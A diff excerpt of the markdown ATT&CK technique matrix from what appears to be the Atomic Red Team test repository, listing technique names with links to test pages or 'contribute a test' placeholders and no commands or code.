| | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Log Enumeration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | [Data Destruction](../../T1485/T1485.md) |
|
||||
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Remote Access Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Input Capture: Credential API Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | | | [Non-Standard Port](../../T1571/T1571.md) | [Inhibit System Recovery](../../T1490/T1490.md) |
|
||||
| | | Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | | | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
|
||||
| | | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery](../../T1614/T1614.md) | | | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Based Evasion](../../T1497.003/T1497.003.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) | | | | Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | Impair Defenses: Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) | | | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) | | | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | TCC Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Subvert Trust Controls: Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture: Credential API Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Remote Desktop Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | | Local Storage Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | | [System Time Discovery](../../T1124/T1124.md) | | | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
|
||||
| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
|
||||
| | | Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | | Junk Code Insertion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Data Obfuscation via Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | | | | | | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) | |
|
||||
| | | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | | Impair Defenses: Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Extended Attributes [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | | SVG Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Power Settings [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Masquerading: Masquerade Task or Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Plist File Modification](../../T1647/T1647.md) | | | | | | | |
|
||||
| | | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Impair Defenses: Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
@@ -60,8 +60,10 @@
|
||||
| | | | | [Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md) | | | | | | | |
|
||||
| | | | | [Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md) | | | | | | | |
|
||||
| | | | | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Delay Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | [Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md) | | | | | | | |
|
||||
| | | | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Browser Fingerprint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Resource Forking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
|
||||
@@ -13,43 +13,43 @@
|
||||
| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | ESXi Administration Command [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Removable Media](../../T1025/T1025.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Stop](../../T1489/T1489.md) |
|
||||
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Direct Volume Access](../../T1006/T1006.md) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [System Service Discovery](../../T1007/T1007.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | [Protocol Tunneling](../../T1572/T1572.md) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Modify Cloud Resource Hierarchy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Forge Web Credentials: SAML token](../../T1606.002/T1606.002.md) | [Network Sniffing](../../T1040/T1040.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AutoHotKey & AutoIT](../../T1059.010/T1059.010.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | [Hide Artifacts: Email Hiding Rules](../../T1564.008/T1564.008.md) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [Network Share Discovery](../../T1135/T1135.md) | Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Systemctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Data from Cloud Storage Object](../../T1530/T1530.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Rootkit](../../T1014/T1014.md) | [Network Sniffing](../../T1040/T1040.md) | [System Information Discovery](../../T1082/T1082.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deploy a container](../../T1610/T1610.md) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md) | [Masquerading: Double File Extension](../../T1036.007/T1036.007.md) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [System Network Configuration Discovery: Wi-Fi Discovery](../../T1016.002/T1016.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Local System](../../T1005/T1005.md) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | IDE Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Application Window Discovery](../../T1010/T1010.md) | [Lateral Tool Transfer](../../T1570/T1570.md) | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
|
||||
| [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | [Command and Scripting Interpreter](../../T1059/T1059.md) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Hijack Execution Flow: DLL](../../T1574.001/T1574.001.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Ccache Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Evil Twin [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Service Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Exec Into Container](../../T1609/T1609.md) | [Office Application Startup](../../T1137/T1137.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | [Time Based Evasion](../../T1497.003/T1497.003.md) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [System Services: Launchctl](../../T1569.001/T1569.001.md) | [Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md) | Additional Container Cluster Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cloud Infrastructure Discovery](../../T1580/T1580.md) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | [Archive Collected Data](../../T1560/T1560.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Wi-Fi Networks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Device CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
|
||||
| | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL](../../T1574.001/T1574.001.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | Virtual Machine Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
|
||||
